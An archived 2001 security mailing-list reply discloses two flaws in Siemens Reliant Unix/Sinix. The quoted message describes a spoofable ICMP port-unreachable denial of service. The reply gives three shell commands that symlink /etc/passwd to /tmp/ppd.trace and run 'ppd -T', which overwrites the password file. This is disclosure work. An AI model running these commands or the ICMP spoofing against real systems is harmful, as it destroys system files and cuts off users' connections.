Re: Reliant Unix 5.43 / 5.44 ICMP port unreachable problem

From: Pablo Ruiz Garcia (pruizat_private)
Date: Sat Apr 14 2001 - 07:55:58 PDT

    On Fri, Apr 06, 2001 at 17:28:03 +0200, Andrea Barisani wrote:
    > Hi to all,
    >
    > I don't know if anyone might be interested in this (Reliant Unix is a sort
    > of archaeological OS) but sending an icmp port unreachable error to a RU
    > cause an immediate drop of all the connections in progress between the
    > server and the icmp-sender host, of course spoofing the icmp address
    > originator cause the drop of connections between an arbitrary host.
    >
    > Bye

    Talking on Reliant/Sinix:

    ln -s /etc/passwd /tmp/ppd.trace

    /opt/bin/ppd -T

    cat /etc/passwd
    [..]

    OOps..  (try to backup your /etc/passwd before you try this)

    I have benn thinking on /tmp/ppd.log, but i can't make anything similar
    with it.

    Also, if you specify any kind of parameter other than -T ppd will try
    to call this number, but do not dump to /tmp/ppd.trace so you cant
    use the tmp race.

    i know this some months ago and it's notified to siemens, but i got no response

    Att. Pablo

    No more to say...

    P.D: If anyone wanna know exactly on which sinix/reliant systems does it work,
    askme plz.

    --
    Pablo Ruiz Garcia (Pci)
    Consultor de Seguridad